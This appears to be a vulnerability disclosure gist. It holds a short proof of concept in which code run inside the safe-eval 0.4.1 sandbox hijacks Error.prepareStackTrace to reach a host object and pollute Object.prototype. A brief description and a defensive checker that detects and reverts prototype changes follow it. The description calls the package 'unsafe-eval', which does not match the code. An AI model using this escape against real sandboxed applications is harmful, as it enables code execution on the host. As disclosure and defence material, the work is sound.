@seongil-wi
Last active March 26, 2023 08:22
// node version: 19.8.1
// safe-eval version: 0.4.1
var safeEval = require('safe-eval')

// Code handed to the sandbox
let code = `
(function() {
  Error.prepareStackTrace = (_, c) => c[0].getThis();
  ret = (new Error()).stack;
  ret.__proto__.polluted = "ret.__proto__.polluted";
})()
`
safeEval(code);

// Back on the host: a fresh object literal now carries the injected property
const polluted_result = {}["polluted"];
console.log(polluted_result);
@seongil-wi

Vulnerability description:

unsafe-eval is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Affected versions of this package are vulnerable to prototype pollution. Especially, the attacker is able to access host error objects during the generation of a stack trace, which can lead to execution of arbitrary code on the host machine.
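
A host-side check for the effect shown in the PoC, as an added example that is not part of the gist or of safe-eval: it snapshots the shared prototypes, runs a callback, then reports and rolls back any property that was added, changed or deleted. `runWithPollutionCheck` and `runUntrusted` are hypothetical names, and the demo callback is a constructed stand-in for the `safeEval(code)` call so the block runs without the package.

```javascript
// Added example (not from the gist). `runUntrusted` is a hypothetical callback
// that would wrap the safeEval(code) call.
const WATCHED = [['Object', Object.prototype], ['Array', Array.prototype],
                 ['Function', Function.prototype]];

// Record every own key (strings and symbols) and its descriptor.
function snapshot() {
  return WATCHED.map(([, proto]) => new Map(
    Reflect.ownKeys(proto).map((k) => [k, Object.getOwnPropertyDescriptor(proto, k)])));
}

function sameDescriptor(a, b) {
  return ['value', 'get', 'set', 'writable', 'enumerable', 'configurable']
    .every((f) => a[f] === b[f]);
}

// Run the callback, then diff the shared prototypes against the snapshot.
// Each change is reported and rolled back; `restored` is false when the
// rollback was refused (for example a non-configurable property).
function runWithPollutionCheck(runUntrusted) {
  const before = snapshot();
  let error = null;
  try { runUntrusted(); } catch (e) { error = e; }
  const findings = [];
  WATCHED.forEach(([name, proto], i) => {
    // Added keys are handled first, so a polluted "get" or "value" cannot leak
    // into the saved descriptors while originals are being restored.
    const keys = [...new Set([...Reflect.ownKeys(proto), ...before[i].keys()])]
      .sort((a, b) => before[i].has(a) - before[i].has(b));
    for (const key of keys) {
      const old = before[i].get(key);
      const cur = Object.getOwnPropertyDescriptor(proto, key);
      if (old && cur && sameDescriptor(old, cur)) continue;
      const kind = !old ? 'added' : !cur ? 'deleted' : 'modified';
      const restored = old
        ? Reflect.defineProperty(proto, key, old)
        : Reflect.deleteProperty(proto, key);
      findings.push({ proto: name, key: String(key), kind, restored });
    }
  });
  return { findings, error };
}

// Constructed stand-in for the sandbox escape: writes the same key the PoC does.
const demo = runWithPollutionCheck(() => { ({}).__proto__.polluted = 'constructed'; });
console.log(demo.findings, ({}).polluted);
```

The check only covers the three prototypes listed in `WATCHED`, and it runs after the callback returns, so it detects and reverts pollution rather than preventing code that acts on it during the call.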
